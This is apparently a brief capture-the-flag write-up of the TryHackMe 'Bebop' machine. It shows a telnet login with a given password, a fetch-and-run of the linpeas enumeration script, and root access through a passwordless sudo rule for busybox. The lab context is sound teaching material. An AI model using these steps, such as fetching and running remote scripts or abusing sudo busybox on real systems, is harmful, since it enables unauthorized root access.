Who thought making a flying shell was a good idea?

This is Bebop from THM. It’s easy rated and is supposed to be about taking over a drone or something.


SSH and Telnet on port 23.


We were given a password: pilot. Let’s try it?

root@kali:/opt/tryhackme/bebop# telnet 23
Connected to
Escape character is '^]'.
login: admin
Password for admin@freebsd:
login: pilot
Last login: Sat Oct  5 23:48:53 from
FreeBSD 11.2-STABLE (GENERIC) #0 r345837: Thu Apr  4 02:07:22 UTC 2019

Pretty easy. And in fact we can read both flags as pilot! Surely it’s not that easy?

Yes, it is.

But let’s get root. No wget or curl; the FreeBSD equivalent is fetch:

[pilot@freebsd /tmp]$ fetch                                             310 kB  164 kBps    02s
[pilot@freebsd /tmp]$ chmod +x 
[pilot@freebsd /tmp]$ ./ 
 Starting linpeas. Caching Writable Folders...

Probably should’ve found this myself, but anyway:

[pilot@freebsd /tmp]$ sudo -l
User pilot may run the following commands on freebsd:
    (root) NOPASSWD: /usr/local/bin/busybox
[pilot@freebsd /tmp]$ sudo -u root /usr/local/bin/busybox sh
# id;hostname
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)

Easy feels like an understatement.